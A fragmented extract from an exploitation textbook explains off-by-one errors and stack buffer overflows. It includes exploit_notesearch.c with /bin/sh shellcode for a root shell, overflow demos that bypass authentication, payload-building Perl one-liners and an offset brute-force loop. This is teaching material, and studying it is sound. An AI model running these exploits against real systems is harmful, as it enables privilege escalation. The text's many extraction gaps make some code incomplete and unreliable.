reader@hacking:~/booksrc $ sudo chown root:root
...
/game_of_chance
reader@hacking:~/booksrc $
...

You have been given 100 credits
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

Sorry, you didn't win
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] -> 2
[DEBUG] current_game pointer @ 0x08048f61
::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits
...

If there are no matches among them, you double your money!

How many of your 90 credits would you like to wager? 30
::: Dealing out 16 random numbers :::
88 68 82 51 21 73 80 50
11 64 78 85 39 42 40 95
There were no matches! You win 30 credits!
You now have 120 credits
Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] -> 3
[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits
...

If you find the ace, you will win your wager
...

At this point you may either select a different card or
increase your wager
...
_
...
_
...
_
...
_
...

*** End result ***

...
_
...

Cards: |A| |Q| |Q|
^-- your pick
You have won 50 credits from your first wager
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username

6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 4
====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 7
Thanks for playing! Bye
...
/game_of_chance
-=-={ New Player Registration }=-=Enter your name: Jose Ronnick
Welcome to the Game of Chance Jose Ronnick
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score 5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] -> 4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170
...

jose@hacking:~/booksrc $ exit
exit
reader@hacking:~/booksrc $

Play around with this program a little bit
...
Many people have difficulty understanding this
truth—that's why it's counterintuitive
...

Chapter 0x300
...
As demonstrated in the previous
chapter, a program is made up of a complex set of rules following a certain
execution flow that ultimately tells the computer what to do
...
Since a
program can really only do what it's designed to do, the security holes are actually
flaws or oversights in the design of the program or the environment the program
is running in
...
Sometimes these holes are the products of relatively
obvious programmer errors, but there are some less obvious errors that have
given birth to more complex exploit techniques that can be applied in many
different places
...

Unfortunately, what's written doesn't always coincide with what the programmer
intended the program to do
...
Instinctively, he picks the lamp up, rubs the side of it with his
sleeve, and out pops a genie
...
The man is ecstatic and knows
exactly what he wants
...
"
The genie snaps his fingers and a briefcase full of money materializes out
of thin air
...
"
The genie snaps his fingers and a Ferrari appears from a puff of smoke
...
"
The genie snaps his fingers and the man turns into a box of chocolates
...
Sometimes the repercussions can
be catastrophic
...
For example, one common programming error is called an off-by-one error
...

This happens more often than you might think, and it is best illustrated with a
question: If you're building a 100-foot fence, with fence posts spaced 10 feet
apart, how many fence posts do you need? The obvious answer is 10 fence posts,

but this is incorrect, since you actually need 11
...
Another example is
when a programmer is trying to select a range of numbers or items for
processing, such as items N through M
...
But this is
incorrect, since there are actually M - N + 1 items, for a total of 13 items
...

Often, fencepost errors go unnoticed because programs aren't tested for every
single possibility, and the effects of a fencepost error don't generally occur during
normal program execution
...
When properly exploited, an
off-by-one error can cause a seemingly secure program to become a security
vulnerability
...
However, there was an off-by-one error in
the channel-allocation code that was heavily exploited
...

This simple off-by-one error allowed further exploitation of the program, so that a
normal user authenticating and logging in could gain full administrative rights to
the system
...

Another situation that seems to breed exploitable programmer errors is when a
program is quickly modified to expand its functionality
...

Microsoft's IIS webserver program is designed to serve static and interactive web
content to users
...
Without this
limitation, users would have full control of the system, which is obviously
undesirable from a security perspective
...

With the addition of support for the Unicode character set, though, the complexity
of the program continued to increase
...

By using two bytes for each character instead of just one, Unicode allows for tens
of thousands of possible characters, as opposed to the few hundred allowed by
single-byte characters
...
For example, %5c in Unicode
translates to the backslash character, but this translation was done after the pathchecking code had run
...
Both the
Sadmind worm and the CodeRed worm used this type of Unicode conversion
oversight to deface web pages
...
Just like the rules of a
computer program, the US legal system sometimes has rules that don't say
exactly what their creators intended, and like a computer program exploit, these
legal loopholes can be used to sidestep the intent of the law
...
Those who had software to give would upload it, and those who wanted
software would download it
...
Software companies claimed that
they lost one million dollars as a result of Cynosure, and a federal grand jury
charged LaMacchia with one count of conspiring with unknown persons to violate
the wire fraud statue
...
Apparently, the lawmakers had never anticipated that
someone might engage in these types of activities with a motive other than
personal financial gain
...
) Even though this example doesn't involve the exploiting of a
computer program, the judges and courts can be thought of as computers
executing the program of the legal system as it was written
...

Generalized Exploit Techniques
Off-by-one errors and improper Unicode expansion are all mistakes that can be
hard to see at the time but are glaringly obvious to any programmer in hindsight
...
The impact of these mistakes on security isn't always apparent,
and these security problems are found in code everywhere
...

Most program exploits have to do with memory corruption
...
With these techniques, the ultimate goal is to take
control of the target program's execution flow by tricking it into running a piece
of malicious code that has been smuggled into memory
...
Like the LaMacchia
Loophole, these types of vulnerabilities exist because there are specific
unexpected cases that the program can't handle
...
But if the environment is carefully controlled, the
execution flow can be controlled—preventing the crash and reprogramming the
process
...
Most Internet worms use buffer overflow
vulnerabilities to propagate, and even the most recent zero-day VML vulnerability
in Internet Explorer is due to a buffer overflow
...
If this responsibility were shifted over to the
compiler, the resulting binaries would be significantly slower, due to integrity
checks on every variable
...

While C's simplicity increases the programmer's control and the efficiency of the
resulting programs, it can also result in programs that are vulnerable to buffer
overflows and memory leaks if the programmer isn't careful
...
If a programmer wants
to put ten bytes of data into a buffer that had only been allocated eight bytes of
space, that type of action is allowed, even though it will most likely cause the
program to crash
...
If a critical piece of data is overwritten, the
program will crash
...
c code offers an example
...
c
#include ...
h>
int main(int argc, char *argv[]) {
int value = 5;
char buffer_one[8], buffer_two[8];

strcpy(buffer_one, "one"); /* Put "one" into buffer_one
...
*/

printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1]));
strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two
...
After compilation in the sample output below, we try to copy ten
bytes from the first command-line argument into buffer_two, which only has
eight bytes allocated for it
...
c
reader@hacking:~/booksrc $
...

A larger buffer will naturally overflow into the other variables, but if a large
enough buffer is used, the program will crash and die
...
/overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 29 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

These types of program crashes are fairly common—think of all of the times a
program has crashed or blue-screened on you
...
These kinds of mistakes are easy to make and can be difficult to spot
...
c program on notesearch
...

You might not have noticed this until right now, even if you were already familiar
with C
...
/notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]------Segmentation fault
reader@hacking:~/booksrc $

Program crashes are annoying, but in the hands of a hacker they can become
downright dangerous
...
The exploit_notesearch
...

exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

for(i=0; i < 160; i+=4) // Fill buffer with return address
...

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit
...
It uses string functions to do this:
strlen() to get the current length of the string (to position the buffer pointer)
and strcat() to concatenate the closing single quote to the end
...
The buffer that is
generated between the single quotes is the real meat of the exploit
...
Watch what a controlled crash
can do
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------sh-3
...
This is an example of a stack-based buffer overflow
exploit
...

The auth_overflow
...

auth_overflow
...
h>
#include ...
h>
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted
...
\n");
}
}

This example program accepts a password as its only command-line argument
and then calls a check_authentication() function
...
If
either of these passwords is used, the function returns 1, which grants access
...
Use the -g option when you do compile it, though, since we
will be debugging this later
...
c
reader@hacking:~/booksrc $
...
/auth_overflow

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=reader@hacking:~/booksrc $

So far, everything works as the source code says it should
...
But an overflow can lead
to unexpected and even contradictory behavior, allowing access without a proper
password
...
/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-= Access Granted
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) list 1
1 #include ...
h>
3 #include ...
c, line 9
...
c, line 16
...
When the program is run, execution
will pause at these breakpoints and give us a chance to examine memory
...
c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0: ")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0: 0xb7f9f729 0xb7fd6ff4 0xbffff7d8 0x08048529
0xbffff7b0: 0xb7fd6ff4 0xbffff870 0xbffff7d8 0x00000000
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb)

The first breakpoint is before the strcpy() happens
...
By examining the
address of the auth_flag variable, we can see both its location at 0xbffff7bc and
its value of 0
...
This relationship can
also be seen in a block of memory starting at password_buffer
...

(gdb) continue
Continuing
...
c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0: 'A'
(gdb) x/x &auth_flag
0xbffff7bc: 0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc: 65 'A' 65 'A' 0 '\0' 0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc: 16705
(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory
locations are examined again
...
The value of 0x00004141 might

look backward again, but remember that x86 has little-endian architecture, so it's
supposed to look that way
...
Ultimately, the program will
treat this value as an integer, with a value of 16705
...

-=-=-=-=-=-=-=-=-=-=-=-=-= Access Granted
...

(gdb)

After the overflow, the check_authentication() function will return 16705
instead of 0
...
In this example, the auth_flag variable is the execution control point,
since overwriting this value is the source of the control
...
In auth_overflow2
...

(Changes to auth_overflow
...
)

auth_overflow2
...
h>
#include ...
h>
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;

strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted
...
\n");

}
}

This simple change puts the auth_flag variable before the password_buffer in
memory
...

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1 #include ...
h>
3 #include ...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9b7 'A' ) at
auth_overflow2
...

This means auth_flag can never be overwritten by an overflow in
password_buffer
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' )
at auth_overflow2
...
But another execution control point does exist, even though you
can't see it in the C code
...
This memory is integral to the operation of all
programs, so it exists in all programs, and when it's overwritten, it usually results
in a program crash
...

Program received signal SIGSEGV, Segmentation fault
...
The stack is a FILO data structure used to maintain execution
flow and context for local variables during function calls
...
Each stack frame contains
the local variables for that function and a return address so EIP can be restored
...
All of this is built in to the architecture and is
usually handled by the compiler, not the programmer
...
In this frame are the local
variables, a return address, and the function's arguments
...

Figure 0x300-1
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
h>
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb)
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
16 return auth_flag;
17 }
18
19 int main(int argc, char *argv[]) {
20 if(argc < 2) {
(gdb)
21 printf("Usage: %s \n", argv[0]);
22 exit(0);
23 }
24 if(check_authentication(argv[1])) {
25 printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
26 printf(" Access Granted
...
\n");
30 }

(gdb) break 24
Breakpoint 1 at 0x80484ab: file auth_overflow2
...

(gdb) break 9
Breakpoint 2 at 0x8048421: file auth_overflow2
...

(gdb) break 16
Breakpoint 3 at 0x804846f: file auth_overflow2
...

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a
...
c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xbffff7e0 0xbffff7e0
(gdb) x/32xw $esp
0xbffff7e0: 0xb8000ce0 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
0xbffff820: 0x40f5f7f0 0x48e0fe81 0x00000000 0x00000000
0xbffff830: 0x00000000 0xb7ff9300 0xb7eafded 0xb8000ff4
0xbffff840: 0x00000002 0x08048350 0x00000000 0x08048371
0xbffff850: 0x08048474 0x00000002 0xbffff874 0x08048510
(gdb)

The first breakpoint is right before the call to check_authentication()in main()
...
This is all part of main()'s stack frame
...
After finding the addresses of the auth_flag variable ( ) and the variable
password_buffer ( ), their locations can be seen within the stack frame
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' ) at
auth_overflow2
...
Since the
stack grows upward toward lower memory addresses, the stack pointer is now 64
bytes less at 0xbffff7a0
...
For example, the
first 24 bytes of this stack frame are just padding put there by the compiler
...
The auth_flag is shown at
0xbffff7bc, and the 16 bytes of the password buffer are shown at 0xbffff7c0
...

Elements of the check_authentication() stack frame are shown below
...
This starts at the
auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte
password_buffer variable
...
If the program is
compiled with the flag -fomit-frame-pointer for optimization, the frame pointer
won't be used in the stack frame
...
This must be the argument to the check_authentication()
function
...
This process begins in the main() function, even before
the function call
...

(gdb)

Notice the two lines shown in bold on page 131
...
This is also the argument
to check_authentication()
...
This starts the stack frame for
check_authentication() with the function argument
...
This instruction pushes the address of the next instruction to the
stack and moves the execution pointer register (EIP) to the start of the
check_authentication() function
...
In this case, the address of the next instruction is
0x080484bb, so that is the return address
...

0x08048472 : leave
0x08048473 : ret
End of assembler dump
...
These instructions are known as the function
prologue
...
This saves 56 bytes for the local variables of
the function
...

When the function finishes, the leave and ret instructions remove the stack
frame and set the execution pointer register (EIP) to the saved return address in
the stack frame ( )
...
This process happens
every time a function is called in any program
...

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' )
at auth_overflow2
...

Program received signal SIGSEGV, Segmentation fault
...
This
usually results in a crash, since execution is essentially jumping to a random
location
...
If the overwrite is controlled,
execution can, in turn, be controlled to jump to a specific location
...
The BASH shell and Perl are common on
most machines and are all that is needed to experiment with exploitation
...
Perl can be
used to execute instructions on the command line by using the -e switch like this:
reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'
AAAAAAAAAAAAAAAAAAAA

This command tells Perl to execute the commands found between the single
quotes—in this case, a single command of print "A" x 20;
...

Any character, such as a nonprintable character, can also be printed by using
\x##, where ## is the hexadecimal value of the character
...

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'
AAAAAAAAAAAAAAAAAAAA

In addition, string concatenation can be done in Perl with a period (
...

reader@hacking:~/booksrc $ perl -e 'print "A"x20
...
"\x61\x66\x67\x69"x2
...
This is done by surrounding the command with parentheses and prefixing a
dollar sign
...
This exact
command-substitution effect can be accomplished with grave accent marks (', the
tilted single quote on the tilde key)
...

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me
Linux
reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me
Linux
reader@hacking:~/booksrc $

Command substitution and Perl can be used in combination to quickly generate
overflow buffers on the fly
...
c program with buffers of precise lengths
...
/overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 30 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $ gdb -q
(gdb) print 0xbffff7f4 - 0xbffff7e0
$1 = 20
(gdb) quit
reader@hacking:~/booksrc $
...
"ABCD"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'
[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241)
reader@hacking:~/booksrc $

In the output above, GDB is used as a hexadecimal calculator to figure out the
distance between buffer_two (0xbfffff7e0) and the value variable
(0xbffff7f4), which turns out to be 20 bytes
...
The first character is the least significant byte, due to the littleendian architecture
...

reader@hacking:~/booksrc $
...

"\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'
[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)
reader@hacking:~/booksrc $

This technique can be applied to overwrite the return address in the
auth_overflow2
...
In the example below, we will

overwrite the return address with a different address in main()
...
c
reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) disass main
Dump of assembler code for function main:
0x08048474 : push ebp
0x08048475 : mov ebp,esp
0x08048477 : sub esp,0x8
0x0804847a : and esp,0xfffffff0
0x0804847d : mov eax,0x0
0x08048482 : sub esp,eax
0x08048484 : cmp DWORD PTR [ebp+8],0x1
0x08048488 : jg 0x80484ab
0x0804848a : mov eax,DWORD PTR [ebp+12]
0x0804848d : mov eax,DWORD PTR [eax]
0x0804848f : mov DWORD PTR [esp+4],eax
0x08048493 : mov DWORD PTR [esp],0x80485e5
0x0804849a : call 0x804831c
0x0804849f : mov DWORD PTR [esp],0x0
0x080484a6 : call 0x804833c
0x080484ab : mov eax,DWORD PTR [ebp+12]
0x080484ae : add eax,0x4
0x080484b1 : mov eax,DWORD PTR [eax]
0x080484b3 : mov DWORD PTR [esp],eax
0x080484b6 : call 0x8048414
0x080484bb : test eax,eax
0x080484bd : je 0x80484e5
0x080484bf : mov DWORD PTR [esp],0x80485fb
0x080484c6 : call 0x804831c
0x080484cb : mov DWORD PTR [esp],0x8048619
0x080484d2 : call 0x804831c
0x080484d7 : mov DWORD PTR [esp],0x8048630
0x080484de : call 0x804831c

0x080484e3 : jmp 0x80484f1
0x080484e5 : mov DWORD PTR [esp],0x804864d
0x080484ec : call 0x804831c
0x080484f1 : leave
0x080484f2 : ret
End of assembler dump
...
The beginning of this section is at 0x080484bf, so if the return
address is overwritten with this value, this block of instructions will be executed
...
As long as the start of the buffer is aligned with DWORDs on
the stack, this mutability can be accounted for by simply repeating the return
address many times
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=Segmentation fault (core dumped)

reader@hacking:~/booksrc $

In the example above, the target address of 0x080484bf is repeated 10 times to
ensure the return address is overwritten with the new target address
...
This gives
us more control; however, we are still limited to using instructions that exist in the
original programming
...

int main(int argc, char *argv[]) {
int userid, printing=1, fd; // File descriptor
char searchstring[100];
if(argc > 1) // If there is an arg
strcpy(searchstring, argv[1]); // that is the search string;
else // otherwise,
searchstring[0] = 0; // search string is empty
...
These instructions are called shellcode, and they tell the
program to restore privileges and open a shell prompt
...
Since this program
expects multiuser access, it runs under higher privileges so it can access its data
file, but the program logic prevents the user from using these higher privileges
for anything other than accessing the data file—at least that's the intention
...
This technique allows the
program to do things it was never programmed to do, while it's still running with
elevated privileges
...
Let's examine the exploit further
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
h>
4 char shellcode[]=
5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7 "\xe1\xcd\x80";
8
9 int main(int argc, char *argv[]) {
10 unsigned int i, *ptr, ret, offset=270;
(gdb)
11 char *command, *buffer;
12
13 command = (char *) malloc(200);
14 bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

18
19 if(argc > 1) // Set offset
...

23
24 for(i=0; i < 160; i+=4) // Fill buffer with return address
...

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

28
29 strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch
...

(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch
...

(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch
...

(gdb)

The notesearch exploit generates a buffer in lines 24 through 27 (shown above in
bold)
...
The loop increments i by 4 each time
...

This has a size of 4, so when the whole thing is dereferenced, the entire 4-byte
value found in ret is written
...
out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch
'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

At the first breakpoint, the buffer pointer shows the result of the for loop
...

The next instruction is a call to memset(), which starts at the beginning of the

buffer and sets 60 bytes of memory with the value 0x90
...

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch '", '\220' ,
"¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿
¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

Finally, the call to memcpy() will copy the shellcode bytes into buffer+60
...

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch '", '\220' , "1À1Û1É\231°gÍ
\200j\vXQh//shh/
bin\211ãQ\211âS\211áÍ
\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

Now the buffer contains the desired shellcode and is long enough to overwrite the
return address
...
But this return address
must point to the shellcode located in the same buffer
...
This can
be a difficult prediction to try to make with a dynamically changing stack
...
NOP is an assembly instruction that is short for
no operation
...
These

instructions are sometimes used to waste computational cycles for timing
purposes and are actually necessary in the Sparc processor architecture, due to
instruction pipelining
...
We'll create a large array (or sled) of these
NOP instructions and place it before the shellcode; then, if the EIP register points
to any address found in the NOP sled, it will increment while executing each NOP
instruction, one at a time, until it finally reaches the shellcode
...
On the x86 architecture, the NOP instruction is equivalent to the hex
byte 0x90
...

Even with a NOP sled, the approximate location of the buffer in memory must be
predicted in advance
...
By subtracting an offset from
this location, the relative address of any variable can be obtained
...
c
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

In the notesearch exploit, the address of the variable i in main()'s stack frame is
used as a point of reference
...
This offset was previously determined to be
270, but how is this number calculated?
The easiest way to determine this offset is experimentally
...

Since the notesearch exploit allows an optional command-line argument to define
the offset, different offsets can quickly be tested
...
c
reader@hacking:~/booksrc $
...
out 100
-------[ end of note data ]------reader@hacking:~/booksrc $
...
out 200
-------[ end of note data ]------reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid
...
The seq command is a simple program that
generates sequences of numbers, which is typically used with looping
...
When three arguments are used, the middle argument
dictates how much to increment each time
...

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $

The function of the for loop should be familiar, even if the syntax is a little
different
...
Then everything between the do and done keywords
is executed
...
Since the NOP
sled is 60 bytes long, and we can return anywhere on the sled, there is about 60
bytes of wiggle room
...

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
>
...
out $i
> done

Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a value that
points somewhere on the NOP sled
...
This is how the default offset value was discovered
...
Fortunately, there are
other locations in memory where shellcode can be stashed
...
The example below sets an environment variable called MYVAR to the string
test
...
In addition, the env command will show all the environment variables
...

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/
...
2-gnome2
WINDOWID=39845969
